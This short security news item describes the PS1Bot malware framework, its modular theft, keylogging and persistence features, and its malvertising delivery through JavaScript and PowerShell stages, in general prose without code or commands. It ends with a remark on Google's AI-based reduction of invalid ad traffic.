app and web content

Cybersecurity experts have identified a new malware framework called PS1Bot, which features a modular architecture allowing it to perform various malicious actions, including information theft, keylogging, reconnaissance, and establishing persistent access. PS1Bot employs stealth techniques, such as in-memory execution, to minimize its digital footprint and complicate forensic investigations. Active since early 2025, it uses malvertising as a primary infection vector, delivering a compressed archive containing a JavaScript payload that downloads and executes a PowerShell script. This script connects to a command-and-control server to retrieve additional commands and can perform actions like antivirus detection, screen capture, data extraction from cryptocurrency wallets, and maintaining persistence on the infected system. The information stealer module is particularly concerning due to its ability to locate sensitive files related to cryptocurrency. PS1Bot shares technical similarities with AHK Bot and is linked to previous ransomware campaigns using Skitnet. In response to these threats, Google has implemented advanced AI systems to combat invalid traffic, achieving a 40% reduction in deceptive ad practices.